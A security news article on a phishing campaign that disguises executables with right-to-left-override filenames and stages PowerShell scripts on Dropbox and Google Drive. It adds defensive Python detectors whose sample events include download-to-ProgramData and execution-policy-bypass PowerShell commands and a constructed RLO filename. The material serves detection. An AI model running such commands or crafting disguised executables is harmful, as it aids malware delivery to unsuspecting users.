Top Cloud Storage Platforms Hijacked to Host Malware: Make Sure Google Drive or Dropbox Link is Safe
A new hacking campaign has been discovered where the attackers abuse legitimate cloud storage services to host malicious payloads.
In a research report, Securonix said the campaign starts with a phishing email containing a .ZIP archive. When the archive is unzipped, it produces an executable file that looks like an Excel file. The filename contains a hidden Unicode Right-to-Left Override character (RLO, U+202E), which makes everything after it display in reverse order.
So instead of seeing the filename as “RFQ-101432620247fl*U+202E*xslx.exe,” victims see “RFQ-101432620247flexe.xlsx” and can be tricked into thinking they are opening a spreadsheet. The operating system still treats the file as an .exe.
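To make the override visible in practice, here is an added Python example (not from the Securonix report) that renders the displayed name of a filename containing U+202E and compares the extension the user sees with the one the operating system actually uses. The sample filename is constructed to match the pattern quoted above; the list of bidi control characters beyond RLO is our own addition.

```python
# Bidi control characters that can change how a filename is rendered.
# U+202E (RLO) is the one used in this campaign; the rest are included so the
# check also catches variants (this list is our assumption, not from the report).
BIDI_CONTROLS = {
    "\u202a": "LRE", "\u202b": "RLE", "\u202c": "PDF", "\u202d": "LRO",
    "\u202e": "RLO", "\u2066": "LRI", "\u2067": "RLI", "\u2068": "FSI",
    "\u2069": "PDI", "\u200e": "LRM", "\u200f": "RLM",
}


def displayed_name(name: str) -> str:
    """Approximate how a file manager draws a name containing one U+202E:
    the override itself is invisible and everything after it is rendered
    right-to-left, i.e. reversed. (Simplified: one RLO, no nested overrides.)"""
    if "\u202e" not in name:
        return name
    head, _, tail = name.partition("\u202e")
    return head + tail[::-1]


def _extension(name: str) -> str:
    return name.rsplit(".", 1)[-1].lower() if "." in name else ""


def true_extension(name: str) -> str:
    """Extension the OS uses: after the last '.' in the stored name, ignoring
    control characters, which carry no meaning for the loader."""
    stored = "".join(ch for ch in name if ch not in BIDI_CONTROLS)
    return _extension(stored)


def analyze(name: str) -> dict:
    """Compare what the victim sees with what will actually execute."""
    controls = [f"U+{ord(ch):04X} ({BIDI_CONTROLS[ch]})"
                for ch in name if ch in BIDI_CONTROLS]
    shown = displayed_name(name)
    real_ext, shown_ext = true_extension(name), _extension(shown)
    return {
        "stored": name,
        "displayed": shown,
        "bidi_controls": controls,
        "true_extension": real_ext,
        "displayed_extension": shown_ext,
        # Any bidi control in a filename is a red flag; an extension mismatch
        # is the actual deception.
        "suspicious": bool(controls) or real_ext != shown_ext,
    }


# Constructed sample, matching the pattern described in the article.
SAMPLE = "RFQ-101432620247fl\u202exslx.exe"

if __name__ == "__main__":
    for key, value in analyze(SAMPLE).items():
        print(f"{key:>20}: {value}")
```

Running the same check over the names inside an inbound .ZIP before extraction is a cheap mail-gateway or EDR control: a legitimate attachment has no reason to contain U+202E at all.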
Abuse of the cloud
The .ZIP archive comes with a few additional scripts to make the entire campaign seem more authentic, but the main .exe file will trigger a multi-stage deployment action that concludes with two PowerShell scripts hosted on Dropbox and Google Drive.
“The final-stage PowerShell script zz.ps1 has functionality to download files from Google Drive based on specific criteria and save them to a specified path on the local system in the ProgramData folder,” the researchers said.
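As a detection-side counterpart, here is an added Python example (not from the Securonix report) that hunts for the combination described above in process-creation events: PowerShell reaching Google Drive or Dropbox, or touching a script under ProgramData, especially when launched by an executable sitting in a user-writable directory. The sample events, the regular expressions and the two-indicator threshold are all our assumptions; only the cloud hosts and the ProgramData location come from the article.

```python
from __future__ import annotations

import re
from pathlib import PureWindowsPath

# Cloud storage hosts named in the article (hypothetical regex, our assumption).
CLOUD_HOSTS = re.compile(
    r"(?:drive|docs)\.google\.com|(?:www\.|dl\.)?dropbox(?:usercontent)?\.com", re.I)
# A .ps1 anywhere under ProgramData, whether executed (-File) or written (-OutFile).
PROGRAMDATA_PS1 = re.compile(r"\\ProgramData\\\S+\.ps1", re.I)
# Parent binaries living where an unzipped attachment would land.
USER_WRITABLE_PARENT = re.compile(r"\\(?:Temp|Downloads|AppData)\\", re.I)


def is_powershell(image: str) -> bool:
    return PureWindowsPath(image).name.lower() in {"powershell.exe", "pwsh.exe"}


def evaluate(event: dict) -> list[str]:
    """Return the reasons an event matches the pattern; an empty list means no match."""
    if not is_powershell(event["image"]):
        return []
    reasons = []
    cmd = event["cmdline"]
    if CLOUD_HOSTS.search(cmd):
        reasons.append("powershell reaching Google Drive/Dropbox")
    if PROGRAMDATA_PS1.search(cmd):
        reasons.append("powershell script under ProgramData")
    if USER_WRITABLE_PARENT.search(event.get("parent", "")):
        reasons.append("spawned by an executable in a user-writable directory")
    # Any single indicator is noisy on its own (admins use Dropbox too), so
    # require at least two before raising an alert. Threshold is our choice.
    return reasons if len(reasons) >= 2 else []


def hunt(events: list[dict]) -> list[tuple[str, list[str]]]:
    return [(e["cmdline"], r) for e in events if (r := evaluate(e))]


# Constructed sample events (not real telemetry). Paths and URLs are placeholders.
PS = r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"
SAMPLE_EVENTS = [
    {  # final stage launched by the RLO-disguised executable
        "image": PS,
        "parent": r"C:\Users\victim\AppData\Local\Temp\RFQ-101432620247flxslx.exe",
        "cmdline": r"powershell.exe -ExecutionPolicy Bypass -File C:\ProgramData\zz.ps1",
    },
    {  # stage fetched from Google Drive straight into ProgramData
        "image": PS,
        "parent": r"C:\Windows\explorer.exe",
        "cmdline": r'powershell.exe -Command "Invoke-WebRequest https://drive.google.com/uc?export=download&id=EXAMPLE -OutFile C:\ProgramData\update.ps1"',
    },
    {  # routine admin usage, should not alert
        "image": PS,
        "parent": r"C:\Windows\System32\cmd.exe",
        "cmdline": r'powershell.exe -Command "Get-Process | Out-File C:\Users\admin\procs.txt"',
    },
    {  # a user pulling a document from Dropbox: one indicator only, no alert
        "image": PS,
        "parent": r"C:\Windows\explorer.exe",
        "cmdline": r'powershell.exe -Command "Invoke-WebRequest https://www.dropbox.com/s/EXAMPLE/report.pdf?dl=1 -OutFile C:\Users\jdoe\Downloads\report.pdf"',
    },
]

if __name__ == "__main__":
    for cmdline, reasons in hunt(SAMPLE_EVENTS):
        print("ALERT:", cmdline)
        for reason in reasons:
            print("   -", reason)
```

The same three predicates translate directly into a Sysmon Event ID 1 or EDR query; the point of scoring rather than matching any one of them is that Google Drive and Dropbox traffic is normal in most environments, and only the combination with ProgramData staging or an attachment-spawned parent is unusual.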
This isn’t the first time hackers have abused cloud services to host malware or run malicious campaigns in general.
For example, Google Docs, Google’s cloud-based word processor, can share files with other people via email sent from Google’s own infrastructure. Attackers have abused this to bypass spam protection and deliver malicious emails straight to people’s inboxes. Other services, such as DocuSign, SharePoint and GitHub, have been abused in similar ways.
In fact, according to Netskope’s report published two years ago, cloud applications were the largest distributor of malware in 2021.
Securonix called this latest campaign CLOUD#REVERSER. We don’t know how many victims it affects.
Via The Hacker News